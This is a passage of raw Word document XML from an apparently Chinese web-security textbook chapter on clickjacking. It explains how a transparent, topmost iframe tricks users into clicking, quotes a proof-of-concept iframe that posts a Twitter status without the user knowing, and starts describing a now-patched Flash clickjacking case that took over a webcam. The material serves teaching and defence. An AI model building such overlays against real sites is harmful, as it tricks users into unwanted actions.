                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="202" w:right="223" w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>通过控制 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>的长、宽，以及调整 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>left </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>的位置，可以把 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>页面内的任意部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>覆盖到任何地方。同时设置 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>position </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>absolute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>，并将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>z-index </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>的值设置为最大，以达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>到让 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>处于页面的最上层。最后，再通过设置 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>opacity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>来控制 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>页面的透明程度，值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是完全不可见。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="152"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这样，就完成了一次点击劫持的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>点击劫持攻击与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>详见“跨站点请求伪造”一章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>有异曲同工之妙，都是在用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>户不知情的情况下诱使用户完成一些动作。但是在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>攻击的过程中，如果出现用户交互的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>页面，则攻击可能会无法顺利完成。与之相反的是，点击劫持没有这个顾虑，它利用的就是与用户产生交互的页面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="218" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:44.94001pt;width:411.15pt;height:20.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3304;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;iframe</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-61"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>scrolling="no"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-61"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>src</w:t>
                  </w:r>
                  <w:hyperlink r:id="rId39">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>="http://twitter.com/home?status=Yes,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:spacing w:val="-61"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>I</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-61"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>did</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-61"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>click</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-61"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>the</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-61"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>button!!! (WHAT!!??)"&gt;&lt;/iframe&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>twitter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>也曾经遭受过“点击劫持攻击”。安全研究者演示了一个在别人不知情的情况下发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>送一条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>twitter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>消息的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>，其代码与上例中类似，但是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>中的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>地址指向了：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="119" w:firstLine="419"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>twitter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t>里通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>status </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>参数来控制要发送的内容。攻击者调整页面，使得 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Tweet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>按钮</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>被点击劫持。当用户在测试页面点击一个可见的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>button </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>时，实际上却在不经意间发送了一条微博。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:spacing w:val="0"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>点击劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="301"/>
        <w:ind w:left="203" w:right="180" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>下面来看一个更为严重的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击案例。攻击者通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>构造出了点击劫持， 在完成一系列复杂的动作后，最终控制了用户电脑的摄像头。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="160"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>目前 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Adobe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>公司已经在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中修补了此漏洞。攻击过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="177" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>首先，攻击者制作了一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>游戏，并诱使用户来玩这个游戏。这个游戏就是让用户去点击“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CLICK</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>”按钮，每次点击后这个按钮的位置都会发生变化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2703"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="width:158.050pt;height:130pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="0,0" coordsize="3161,2600">
            <v:shape style="position:absolute;left:211;top:67;width:903;height:979" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId40" o:title=""/>
            </v:shape>
            <v:line style="position:absolute" from="10,5" to="3151,5" stroked="true" strokeweight=".48pt" strokecolor="#9a9a9a">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="5,0" to="5,2599" stroked="true" strokeweight=".48pt" strokecolor="#9a9a9a">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="3156,0" to="3156,2599" stroked="true" strokeweight=".48pt" strokecolor="#9a9a9a">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="10,2594" to="3151,2594" stroked="true" strokeweight=".48pt" strokecolor="#9a9a9a">
              <v:stroke dashstyle="solid"/>
            </v:line>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="130"/>
        <w:ind w:left="0" w:right="19" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>演示点击劫持的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>游戏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在其上隐藏了一个看不见的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:114.480003pt;margin-top:7.897832pt;width:207.5pt;height:171.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3352;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="2290,158" coordsize="4150,3430">
            <v:shape style="position:absolute;left:2289;top:165;width:4138;height:3411" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId41" o:title=""/>
            </v:shape>
            <v:line style="position:absolute" from="6434,158" to="6434,3588" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="2290,3583" to="6430,3583" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="124"/>
        <w:ind w:left="3246" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>上隐藏的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>窗口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:114.239998pt;margin-top:36.520004pt;width:208pt;height:169.35pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3376;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="2285,730" coordsize="4160,3387">
            <v:shape style="position:absolute;left:2292;top:730;width:4138;height:3372" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId42" o:title=""/>
            </v:shape>
            <v:line style="position:absolute" from="2290,733" to="2290,4117" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="6439,733" to="6439,4117" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="2294,4112" to="6434,4112" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>游戏中的某些点击是有意义的，某些点击是无效的。攻击通过诱导用户鼠标点击的位置， 能够完成一些较为复杂的流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="126"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>某些点击是无意义的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2099"/>
      </w:pPr>
      <w:bookmarkStart w:name="5.3  图片覆盖攻击" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-48"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-48"/>
        </w:rPr>
        <w:pict>
          <v:group style="width:218.3pt;height:179.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="0,0" coordsize="4366,3586">
            <v:shape style="position:absolute;left:0;top:0;width:4361;height:3574" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId43" o:title=""/>
            </v:shape>
            <v:line style="position:absolute" from="2,3581" to="4366,3581" stroked="true" strokeweight=".48pt" strokecolor="#c1c1c1">
              <v:stroke dashstyle="solid"/>
            </v:line>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-48"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
